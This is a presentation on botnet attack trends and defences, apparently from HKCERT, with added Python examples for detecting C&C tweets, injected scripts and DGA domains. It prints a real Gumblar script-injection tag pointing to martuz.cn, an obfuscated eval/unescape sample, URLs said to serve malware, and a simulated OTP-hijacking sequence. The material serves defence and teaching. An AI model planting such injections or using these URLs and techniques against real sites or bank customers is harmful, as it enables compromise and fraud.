Cyber Attack Trend and Botnet

S.C. Leung
CISSP CISA CBCP

Agenda

• Botnet and Cyber Attack Trends
  – Botnet Attack Trends
    • Commercialization of Cyber Crime
    • Professionalization of Cyber Crimeware
    • Social Engineering always cool – Waledac botnet
    • Following the Social Network Services – Koobface botnet
    • Delivering via Web attack & Search Engine – Gumblar botnet
    • Following the Money – Banking Trojans like Zeus botnet
    • Building the Survival Kit – Conficker botnet

• Defending against Botnet

Botnet (roBot Network)
= infrastructure of controlled victim computers (bots)

[Diagram: the Bot Herder sits at the top and talks to several C&C servers; each C&C server controls a group of bots. Traffic down the tree carries commands and updates, traffic up the tree carries stolen data. The bots are then pointed at victims: spam, malware distribution and phishing on one side, DDoS attack on the other.]





1. Commercialization of Cyber Crime
Product and Service Delivery for Profit

• What do attackers want now?

• What are their products and services?
  – Products
    • Personal credentials, credit card numbers (CCN), SSNs, software CD keys
    • Tools to exploit, tools to hide malware
  – Service subscription:
    • spam, phishing, DDoS
    • botnet (76services.com, now closed)





2. Professionalization of Cyber Crimeware

• Division of labour, R&D and outsourcing

• Malware development, botnet optimization
  – Malware good at detection evasion
  – Malware that identifies and terminates security software
  – Multi-language support
  – Remote administration support
  – Signing and encryption

• IT infrastructure
  – Hosting – network and web hosting in a hacker-friendly environment
    • where there is great bandwidth
    • where legislation is lax
    • where user awareness is low
  – Domain – registration, domain hosting
    • where the take-down procedure is lengthy

Botnet is a sign of the maturity of the infrastructure for the underground economy:
  – Service delivery
  – Maintenance
  – Long-term control





3. Social Engineering always cool

Waledac Botnet

• Spreading by
  – Spam emails that employ social engineering extensively
    • contain a link to a malicious website with an embedded iFrame, tricking the user into installing the malware
• Author = creator of the Storm botnet (which overwhelmed the Internet back in 2007)

• Has a sound infrastructure
  – uses the Nginx web server
  – uses double fast-flux DNS
    • the DNS records (A records) change all the time
    • the DNS servers themselves (NS records) change all the time





Waledac – Fast-flux

[Diagram: bot hosts can be dynamically assigned in real time as the front ends behind the fast-flux domain.]

Waledac theme – eCard
social engineering – follow the talk of the town

[Screenshot: eCard lure leading to the download of postcard.exe]





Waledac Themes
social engineering – follow the talk of the town

[Screenshots of lures: “Terrorist Attack”, “SMS Spy on your Partner”, “Independence Day” theme; one lure offers a video with a Play button]

Waledac Service and Feature

• Impact
  – open a back door on the compromised computer
  – steal personal information
  – spam contacts in the address book
  – turn the zombie into a web server, web proxy, DNS server and spam-template relay

• Major web server services
  – Pharmacy (online pharmacy sites)
  – serving malware





4. Following the Social Network Services
Koobface (koob-face, an anagram of Facebook)

• A worm spreading on Facebook, MySpace, Twitter, Friendster, hi5 & Bebo

• Spreading
  – Spoofs a friend and sends a message: “Hello; You must see it!!! LOL” with a URL
  – The URL brings the user to a fake YouTube site, luring them to install a file “Flash_update.exe”
  – Upon execution, the victim is infected.
• Impact
  – Poisons all user searches (Google, Ask, Yahoo and Bing) so they lead to malicious sites

http://www.f-secure.com/weblog/archives/00001517.html





Koobface: Twitter campaign

• PCs infected with Koobface sent out tweets with a malicious URL

A Botnet uses Twitter as Command Channel
• Bots subscribe to the account's RSS feed to get commands
• A tweet like this:
  – “aHR0cDovL2JpdC5seS9SNlNUViAgaHR0cDovL2JpdC5seS8yS29Ibw==”

• Base64-decoding the tweet, we get 2 tiny URLs:
  – http://bit.ly/R6STV http://bit.ly/2KoHo

• The bit.ly tiny URLs translate to:
  – http://pastebin.com/pastebin.php?dl=m5222dc70
    http://paste.debian.net/43529/download/43529

  – The URLs point to encoded files. When decoded and unzipped, they yield malware files that were poorly detected on VirusTotal

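The decode step above done in code, as an added example that is not part of the original presentation: it strips the line-wrapping the slide introduced, insists on strict base64 so that ordinary tweets are not mis-decoded, and only flags a tweet when the decoded text contains URLs. The timeline it scans is constructed for the example, the shortener list is an assumption, and expanding the bit.ly links is deliberately not performed (the sample stays offline).

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# Constructed sample timeline: the second entry is the base64 tweet quoted on the
# slide; the others are ordinary text, a base64 look-alike, and harmless base64.
SAMPLE_TWEETS = [
    "just had lunch, back to work",
    "aHR0cDovL2JpdC5seS9SNlNUViAgaHR0cDovL2JpdC5seS8yS29Ibw==",
    "ThisLooksLikeBase64ButIsNot!!",
    "aGVsbG8gd29ybGQsIGhhdmUgYSBuaWNlIGRheQ==",   # "hello world, have a nice day"
]

URL_RE = re.compile(r"https?://[^\s'\"<>]+")
# Assumption: a short list of URL shorteners worth expanding offline; extend as needed.
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "is.gd", "goo.gl"}


def try_b64_decode(text):
    """Strict base64 decode of a tweet; returns the decoded text or None.
    Whitespace is removed first because the slide (and many extractions) wrap the token."""
    token = re.sub(r"\s+", "", text)
    if len(token) < 16 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", token):
        return None
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        return raw.decode("ascii")
    except UnicodeDecodeError:
        return None   # binary payload: not the text-with-URLs pattern we are after


def extract_c2_urls(tweet):
    """URLs hidden in a base64-encoded tweet, or [] if the tweet is not one."""
    decoded = try_b64_decode(tweet)
    return URL_RE.findall(decoded) if decoded else []


def is_shortener(url):
    return urlparse(url).netloc.lower() in SHORTENERS


def scan_timeline(tweets):
    """Map each suspicious tweet to its decoded URLs. Expanding the short links and
    fetching the pastes is a separate, sandboxed step and is not done here."""
    findings = {}
    for t in tweets:
        urls = extract_c2_urls(t)
        if urls:
            findings[t] = urls
    return findings


if __name__ == "__main__":
    for tweet, urls in scan_timeline(SAMPLE_TWEETS).items():
        tag = "(all shorteners)" if all(map(is_shortener, urls)) else ""
        print(tweet, "->", urls, tag)
```

The strict alphabet check and `validate=True` matter: a lenient decoder will happily turn many ordinary words into garbage bytes, and the ASCII requirement plus the URL match is what keeps false positives down on a real timeline.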




5. Delivering via Web attack & Search Engine
Gumblar Botnet

Gumblar Botnet: Impact

• Web sites are used as a delivery channel for malware
  – Gumblar steals FTP credentials and uploads malware to 3000 legitimate web sites
  – Infected hosts connect to two domains for downloads: “gumblar.cn” / “martuz.cn”

• Two botnets formed: one of compromised web sites and one of infected client PCs

• Impacts
  – Client PCs: a backdoor installed on the victim's computer connects to the C&C
    • steals FTP credentials from the victim's computer
    • Man-in-the-browser attack: monitors traffic to and from the browser
      – replaces Google search results with links pointing to malicious websites
      – redirects from e-commerce or banking sites to phishing web sites
  – Web sites: any website owned or operated by the victim is compromised
    • distributes malware that exploits Acrobat Reader & Flash Player vulnerabilities





Gumblar Botnet: Obfuscation

• Web pages are injected with obfuscated scripts, which vary from site to site, or even page to page

[Screenshot: an injected script decoded in Malzilla, revealing <script src=//martuz.cn/vid/?id=j></script>]

Gumblar Botnet: Detection and Take down

• Blocking – block the two C&C sites: “gumblar.cn” and “martuz.cn”
• Checking (not 100% accurate)
  – http://www.unmaskparasites.com/security-report/

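A local check a web-site operator can run before relying on a third-party checker, as an added example that is not from the original slides: it parses a page, reports script tags whose src resolves to the two blocked domains (including the protocol-relative form of the injected tag quoted above) and scores inline scripts for the eval/unescape obfuscation pattern, which is what survives when the obfuscation itself varies from page to page. The sample page and the scoring thresholds are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

BLOCKED_DOMAINS = {"gumblar.cn", "martuz.cn"}   # the two download/C&C domains named on the slides


class ScriptCollector(HTMLParser):
    """Collects external <script src> values and inline <script> bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._in_inline, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_inline, self._buf = True, []

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self.inline.append("".join(self._buf))
            self._in_inline = False

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)


def script_host(src):
    """Host of a script src; the protocol-relative '//host/path' form of the injected tag is handled."""
    if src.startswith("//"):
        src = "http:" + src
    return (urlsplit(src).hostname or "").lower()


def obfuscation_score(js):
    """Counts indicators of the eval/unescape style obfuscation the slide shows.
    A score, not a verdict: the thresholds are constructed for this demo and need tuning per site."""
    score = 0
    if re.search(r"\beval\s*\(", js):
        score += 1
    if re.search(r"\b(unescape|String\.fromCharCode|document\.write)\s*\(", js):
        score += 1
    if len(re.findall(r"%[0-9A-Fa-f]{2}|\\x[0-9A-Fa-f]{2}|\\u[0-9A-Fa-f]{4}", js)) >= 20:
        score += 1
    if re.search(r"(?:\d{2,3}\s*,\s*){15,}", js):        # fromCharCode(104,116,116,...) runs
        score += 1
    return score


def scan_page(html, threshold=2):
    """Findings for one page: script srcs on blocked domains and inline scripts scoring >= threshold."""
    p = ScriptCollector()
    p.feed(html)
    p.close()
    return {
        "blocked_src": [s for s in p.external if script_host(s) in BLOCKED_DOMAINS],
        "suspicious_inline": [js for js in p.inline if obfuscation_score(js) >= threshold],
    }


# Constructed page: a normal script, the injected tag quoted on the slide, an obfuscated
# inline block that unescapes to a second injected script tag, and a benign inline script.
SAMPLE_PAGE = """<html><head>
<script src="/static/app.js"></script>
<script src=//martuz.cn/vid/?id=j></script>
<script>eval(unescape('%3C%73%63%72%69%70%74%20%73%72%63%3D%2F%2F%6D%61%72%74%75%7A%2E%63%6E%3E'))</script>
<script>document.getElementById('x').innerHTML='hi';</script>
</head><body>page</body></html>"""

if __name__ == "__main__":
    for key, items in scan_page(SAMPLE_PAGE).items():
        print(key, items)
```

Run it over every HTML file the FTP account can write to, not just the front page: the slide's point is that the injected script differs per page, so a signature for one page proves nothing about the next.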




6. Following the Money
Botnet targeting Banks

• What I have seen on a Zeus Botnet C&C Management interface
  – Bot administration features:
    • Screenshot (save to html without image)
    • Fake redirect (redirect to a prepared fake bank webpage)
    • Html inject (hijack the login session and inject new field)
    :
    • Log the visiting information of each banking site, record the input string (text or post URL)
    • An unknown field (table: yes/no) found with syntax: nn:nnnnnnnn
      – if the value is yes, mostly with comment, the comment logged the a/c information, e.g. transfer limit.





Fake Redirect login page

[Screenshot of a fake bank login page reached by redirect. Source: Computer Associates]

Man-in-the-Browser

Hacker's ideal operation

• Intercept the transaction

• Change the amount and change the destination to the attacker's account, then send it to the bank

• Change the display so the user believes his own transaction was executed
  – Calculate the “should-be amount” and rewrite the remaining balance on screen

Source: www.cronto.com





Man in the Browser (MITB)

• Install software/plugin inside the browser
• Hook key OS and web browser APIs and proxy the data

[Diagram: the MITB component sits between the web application layer and Winsock, inside the browser process, so it sees plaintext on both sides]

• Advantage
  – No encryption barrier as with a network proxy: the hook sits above the SSL layer
  – SSL padlock is unaffected by the modified content
  – Direct access to data
    • freely alter the web page displayed to the customer
    • freely modify the requests sent back to the bank
  – Direct interface to the web browser & application
    • can create additional requests (GET/POST/PUT)
  – Extremely stealthy
    • hard to detect on the client, since the network is not interfered with; web address and digital certificates are all correct
    • the bank sees the customer's real IP address
  – Operates in real time, fast enough to use a one-time password before it expires, so login-time 2FA can be defeated

Limbo 2 - HTML Injection

• Limbo 2 Trojan kit
• Some variants inject fake fields into the online banking forms that the browser displays to the user.

• The additional fields are designed to collect details that help an attacker impersonate the victim and/or compromise the victim's account

What is the use of getting the additional info?

Source: ThreatExpert





Inserting transaction (when login)

[Diagram: the sequence of the attack]
  – Login: the user enters PIN + OTP and clicks Submit.
  – Shadow Login: the Trojan kicks up a shadow login session in the background with the same PIN + OTP.
  – The Trojan inserts a new window in the user's browser: “Not successful. Please retry”.
  – The user enters PIN + OTP2 and clicks Submit.
  – The hacker uses OTP2 to authenticate a transaction in the shadow session.

HKMA Circular 2009-07-13

• The HKMA noticed that the recent fraudulent technique adopted by fraudsters is believed to involve infecting the customer's personal computer (PC) with Trojan horse programs to hijack the Internet banking login credentials of customers (including one-time passwords for two-factor authentication) during the Internet banking login process.

• The hijacked login credentials were used by the fraudsters to conduct high-risk Internet banking transactions such as making fund transfer to an unregistered third-party account.

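Why the login-time OTP harvested in the shadow-login sequence above is enough for the fraudster, and what the bank-side fix looks like, as an added example that is not part of the original presentation or of the HKMA circular: the login OTP is standard HOTP (RFC 4226); the transaction-bound OTP is an assumed construction, in the spirit of the cronto.com source cited earlier, that MACs the destination and amount the customer confirms on the token, so a man-in-the-browser's substituted transfer fails verification even though the customer typed a perfectly valid code. Account numbers, amounts and the shared secret are constructed for the example.

```python
import hashlib
import hmac
import struct
from dataclasses import dataclass


@dataclass(frozen=True)
class Transfer:
    src_account: str
    dst_account: str
    amount_cents: int


def hotp(secret, counter, digits=6):
    """HOTP (RFC 4226): the login-time OTP the slides talk about. Nothing about the
    transaction is in the input, so whoever holds the code can spend it on anything."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    o = mac[-1] & 0x0F
    code = ((mac[o] & 0x7F) << 24) | (mac[o + 1] << 16) | (mac[o + 2] << 8) | mac[o + 3]
    return f"{code % 10 ** digits:0{digits}d}"


def transaction_otp(secret, counter, tx, digits=6):
    """Transaction-bound OTP (assumed construction): destination and amount as shown on the
    customer's token are part of the MAC input, so a code for one transfer cannot authorise another."""
    canon = f"{counter}|{tx.src_account}|{tx.dst_account}|{tx.amount_cents}".encode()
    mac = hmac.new(secret, canon, hashlib.sha256).digest()
    o = mac[-1] & 0x0F
    code = int.from_bytes(mac[o:o + 4], "big") & 0x7FFFFFFF
    return f"{code % 10 ** digits:0{digits}d}"


class BankServer:
    """Toy server that shares `secret` and a moving counter with the customer's token."""

    def __init__(self, secret):
        self.secret, self.counter = secret, 0

    def _accept(self, expected, code):
        ok = hmac.compare_digest(expected, code)
        if ok:
            self.counter += 1
        return ok

    def verify_login(self, code):
        return self._accept(hotp(self.secret, self.counter), code)

    def transfer_with_login_otp(self, tx, code):
        """Scheme A (what the circular describes): any valid token OTP authorises the transfer."""
        return self.verify_login(code)

    def transfer_with_tx_otp(self, tx, code):
        """Scheme B: the code is recomputed over the transfer the bank actually received."""
        return self._accept(transaction_otp(self.secret, self.counter, tx), code)


USER_TX = Transfer("123-456", "789-000", 100_00)              # what the customer meant to send
ATTACKER_TX = Transfer("123-456", "MULE-001", 5_000_000_00)   # what the Trojan substitutes


def shadow_login_attack(secret):
    """The slide's sequence: OTP1 logs the Trojan's shadow session in, the fake 'Not successful,
    please retry' window harvests OTP2, and the Trojan spends OTP2 on its own transfer.
    Returns True if the bank accepted the attacker's transfer."""
    bank = BankServer(secret)
    otp1 = hotp(secret, 0)      # customer types it; the Trojan relays it to the shadow login
    assert bank.verify_login(otp1)
    otp2 = hotp(secret, 1)      # customer types it again into the fake retry window
    return bank.transfer_with_login_otp(ATTACKER_TX, otp2)


def mitb_against_tx_otp(secret):
    """Same Trojan, but the bank demands a transaction-bound OTP: the customer confirms USER_TX
    on the token, the Trojan rewrites the request to ATTACKER_TX. Returns True if accepted."""
    bank = BankServer(secret)
    assert bank.verify_login(hotp(secret, 0))
    code = transaction_otp(secret, 1, USER_TX)   # computed on the token over the real details
    return bank.transfer_with_tx_otp(ATTACKER_TX, code)


def honest_transfer(secret):
    """Control case: unmodified transfer with a transaction-bound OTP is accepted."""
    bank = BankServer(secret)
    assert bank.verify_login(hotp(secret, 0))
    return bank.transfer_with_tx_otp(USER_TX, transaction_otp(secret, 1, USER_TX))


if __name__ == "__main__":
    s = b"12345678901234567890"   # constructed shared secret (the RFC 4226 test key)
    print("login-OTP scheme, attacker transfer accepted:", shadow_login_attack(s))
    print("transaction-OTP scheme, attacker transfer accepted:", mitb_against_tx_otp(s))
    print("transaction-OTP scheme, honest transfer accepted:", honest_transfer(s))
```

The point is not the MAC but what goes into it: the token must show the customer the destination and amount it is signing, because that display is the only channel the man-in-the-browser cannot rewrite.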




7. Building the Survival Kit
Conficker Botnet

Conficker - Propagation Mechanism

[Diagram of Conficker's propagation mechanisms. Source: Cisco 2009 MidYear Report]





Conficker – a model for sustainable botnet

• Designed to survive disaster - what if the C&C is taken down?
  – Conficker.B - domain generation for malware update
    • Active since Nov 2008, generating 250 domains/day in 5 TLDs for updates

  – Conficker's natural predator: the Conficker Working Group
    • Alliance of ICANN, domain registries and the IT industry worked together to pre-empt Conficker
      – pre-register the domains
      – redirect traffic to sinkholes to study the behaviour

  – Conficker.C improved
    • Starting Apr 1, 2009, generating 50,000 domains/day in 116 TLDs; each bot uses 500 of them at random (some are existing domains), making it much harder to pre-empt the domains
    • improved authentication and encryption, so you cannot easily infiltrate the Conficker.C botnet
    • uses P2P for updates as well – peers can update each other with the right authentication
    • blocks more security vendors' web sites

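The pre-registration arms race above as a small simulation, added here and not from the original presentation or the Conficker Working Group: a date-seeded generator (illustrative, not Conficker's real algorithm), a defender that can pre-register only so many domains per day, an attacker who registers a handful of the rest, and bots that poll either every domain or 500 at random. The last function is the sinkhole side the slide mentions: matching a DNS query log against the day's predicted list. The TLD pools, budgets and log lines are constructed for the example.

```python
import hashlib
import random

TLDS_SMALL = ["com", "net", "org", "info", "biz"]       # constructed 5-TLD pool
TLDS_LARGE = [f"tld{i:03d}" for i in range(116)]        # constructed stand-in for 116 TLDs


def generate_domains(day, count, tlds, seed=b"demo-dga"):
    """Date-seeded DGA: deterministic for (day, seed), so bots and anyone who knows the
    algorithm derive the same list. Illustrative only; NOT Conficker's real generator."""
    out = []
    for i in range(count):
        h = hashlib.sha256(seed + day.encode() + i.to_bytes(4, "big")).hexdigest()
        label = "".join(chr(ord("a") + int(h[j:j + 2], 16) % 26) for j in range(0, 16, 2))
        out.append(f"{label}.{tlds[int(h[16:20], 16) % len(tlds)]}")
    return out


def bot_contacts(domains, k, rng_seed):
    """Conficker.C behaviour from the slide: a bot queries only k of the day's domains, at random."""
    rng = random.Random(rng_seed)
    return rng.sample(domains, k) if k < len(domains) else list(domains)


def simulate_day(day, count, tlds, bot_k, defender_budget, attacker_n, bots=50):
    """The defender pre-registers (sinkholes) up to `defender_budget` predicted domains; the
    attacker then registers `attacker_n` of the remaining ones. Returns the fraction of bots
    that reach an attacker domain, i.e. can still pull an update that day."""
    domains = generate_domains(day, count, tlds)
    if defender_budget >= len(domains):
        sinkholed = set(domains)
    else:
        sinkholed = set(random.Random(0).sample(domains, defender_budget))
    attacker = set(sorted(d for d in domains if d not in sinkholed)[:attacker_n])
    reached = sum(1 for b in range(bots)
                  if any(d in attacker for d in bot_contacts(domains, bot_k, b)))
    return reached / bots


def flag_dga_queries(day, count, tlds, query_log):
    """Sinkhole/resolver side: match DNS queries (constructed 'client<TAB>qname' lines) against
    the day's predicted list; a client hitting several of them is probably infected."""
    predicted = set(generate_domains(day, count, tlds))
    hits = {}
    for line in query_log:
        client, _, qname = line.rstrip("\n").partition("\t")
        if qname and qname.lower().rstrip(".") in predicted:
            hits[client] = hits.get(client, 0) + 1
    return hits


if __name__ == "__main__":
    print("250/day, 5 TLDs, all 250 pre-registered:",
          simulate_day("2009-04-01", 250, TLDS_SMALL, 250, 250, 20))
    print("50,000/day, 116 TLDs, 500 polled, 250 pre-registered:",
          simulate_day("2009-04-01", 50_000, TLDS_LARGE, 500, 250, 20))
```

The first run returns 0.0: when the whole daily list fits the defender's budget, the attacker has nothing left to register. The second run is non-zero because a bot polling 500 of 50,000 domains has a real chance of hitting one of the attacker's few, which is exactly why the Working Group's list-and-pre-register approach stopped being sufficient for Conficker.C.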
Collaborative Effort Works!

• The Conficker Working Group led a concerted effort (www.confickerworkinggroup.org)
  – ICANN organized all registries to pre-empt the registration and handle affected domains
  – Researchers generated the list of generated domains and affected domains to provide transparency
  – Some worked out an Eye Chart for easy detection
  – Security vendors developed detection and removal tools

[Eye Chart: images loaded from several security vendor sites; which ones fail to load indicates “No infection”, “Conficker.A/B” or “Conficker.C”]

• HKIRC, HKCERT, Police and OGCIO
  – Check affected domains in the April list for suspicious content
  – Put idle domains under close observation
  – Exchange intelligence on the progress
  – Coordinate with CNCERT/CC on an HK IP address owned by a mainland web hosting provider





Conficker – a model for sustainable Botnet

• Everyone was watching the domain generation, but nothing happened there

• Since Conficker has dual update mechanisms -- domain generation and P2P -- it can use either one at any time. Conficker succeeded in evolving through the P2P channel.

• We still have a long way to go to close it down.

Defending against Botnets

Enhance Response
• The Conficker Working Group approach works! ICANN and others are collaborating more to speed up take-downs.
  – Sharing of intelligence
  – Speed up take-down
  – Pre-empt future attacks

• HKCERT
  – Proactive discovery of malicious sites in Hong Kong (with limited resources)
  – Awareness education for service providers: HKCERT organized with OGCIO and HKPF an “ISP Symposium” in May 2009
  – Cyber Drill: HKCERT organized with OGCIO and HKPF a cyber drill with the theme “Combating Cyber Crime” in July 2009

• HKMA & Banks
  – HKMA circular
  – Banks tighten their procedures for high-risk transactions and fraud detection

Defense against Botnet

• A botnet is malware
• Three baseline defenses are necessary, though insufficient
  – Protection from malware
    • note that browser plug-ins can be malicious or a weak point
  – Personal firewall
  – Update patches
• Server defense
  – Install the minimum of modules on the server. Do not use it to browse the Internet
  – Keep patches up to date
  – Protect from web attacks
    • Application firewall
    • See the SQL Injection Defence Guideline published by HKCERT





Monitor software patch level and take prompt action
• Secunia Personal Software Inspector
  – Scans installed Windows software and reports their patch level, with a threat level
  – Provides a link to download the available patch or workaround
  – http://secunia.com/vulnerability_scanning/personal/

Monitor software update
• CleanSofts.com Update Notifier
  – scans installed Windows software and displays a list of updates
  – verifies the software against malware (best effort with current AV software only, so it is no better than VirusTotal)
  – http://cleansofts.org/view/update-notifier.html





Safe Browsers

• Browsers add anti-malware, anti-phishing features
  – IE, Mozilla, Opera; add the Netcraft toolbar if you want
  – Keep your browsers and plug-ins to a minimum
• Firefox and the Flock browser now incorporate Google safety alerts
• Newer browsers use a sandbox approach: Chrome

Detecting Botnet
Next presentation

Q&A

S.C. Leung (梁兆昌)
scleung@hkcert.org

Building up a Botnet

• Having the malware to infect user machines
  – Detection evasion advancement
  – Control and update
• Getting a channel to deliver the malware
  – Spam: social engineering (Waledac)
  – Legitimate web server redirecting users to exploit servers (Gumblar)
  – Social network redirecting users to exploit servers (Koobface)
  – Exploit servers hosting the malware
• Exploiting vulnerabilities (Windows, browser, Office, Acrobat Reader, Adobe Flash, etc.) of the victim machine
• Controlling the victim PCs
  – Botnet Command and Control Centre
• Providing resilience in case of take-down by law enforcement
  – Fast-flux DNS: to make the structure more dynamic
  – Disaster recovery: find a way to recover (Conficker)